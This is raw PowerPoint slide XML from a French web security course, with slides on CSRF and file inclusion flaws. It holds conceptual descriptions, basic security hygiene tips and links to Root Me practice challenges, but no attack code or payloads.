          <a:xfrm>
            <a:off x="7385289" y="4180486"/>
            <a:ext cx="4106074" cy="2064749"/>
            <a:chOff x="7385289" y="4180486"/>
            <a:chExt cx="4106074" cy="2064749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle : coins arrondis 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE312EB-D829-43C4-AF3C-EC77353C83DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7385289" y="4180486"/>
              <a:ext cx="4106074" cy="2064749"/>
            </a:xfrm>
            <a:prstGeom prst="roundRec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DFB13245-4908-4311-A004-E4E1C6F3EC5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7499589" y="4742764"/>
              <a:ext cx="3991774" cy="1021883"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="just">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ne pas laisser les identifiants par défaut.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="just">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ne pas stocker les identifiants sur un post-it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="just">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Verrouiller sa session de poste.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Signe Moins 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB7B22D0-0B3C-42C5-B983-08D1A3605EB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9268973" y="4303434"/>
              <a:ext cx="453005" cy="316382"/>
            </a:xfrm>
            <a:prstGeom prst="mathMinus">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83790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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="3540034"/>
            <a:ext cx="11385398" cy="2389180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Illustration de faille CSRF en PHP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9074808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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1808912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT ME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.root-me.org/fr/Challenges/Web-Client/CSRF-0-protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39846925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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> File Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="2293126"/>
            <a:ext cx="11385398" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'inclusion de fichiers à distance est une vulnérabilité que l'on trouve souvent dans des applications Web mal écrites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate injecte un script dans une application Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le script est exécuté sur le serveur Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le serveur télécharge le script malicieux depuis le site Web du pirate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le pirate prend le contrôle à travers l’application Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="593881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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> File Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="3749040"/>
            <a:ext cx="11385398" cy="2180174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Illustration de faille RFI en PHP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33076591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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1808912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> File Inclusion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT ME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour la réalisation de ce challenge, il est recommandé de le faire depuis une machine virtuelle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
